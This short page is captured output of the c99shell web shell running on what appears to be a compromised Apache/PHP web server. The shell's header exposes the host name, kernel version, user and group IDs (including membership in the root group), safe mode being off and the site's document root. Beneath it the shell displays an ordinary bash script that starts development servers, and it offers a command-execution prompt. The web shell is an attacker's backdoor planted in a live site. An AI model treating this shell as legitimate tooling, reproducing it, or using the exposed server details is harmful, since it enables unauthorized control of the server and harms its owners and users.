Software: Apache. PHP/8.1.30 uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root) Safe-mode: OFF (not secure) /home/picotech/domains/adflow.picotech.app/public_html/ drwxr-x--- | |
| Viewing file: Select action/file-type: #!/bin/bash # Kill any process on port 5173 (frontend) lsof -ti:5173 | xargs kill -9 2>/dev/null || true # Kill any process on port 8000 (backend) lsof -ti:8000 | xargs kill -9 2>/dev/null || true # Start frontend development server in background cd frontend npm run dev & # Start backend server cd ../backend php artisan serve --host=0.0.0.0 --port=8000 |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]-- |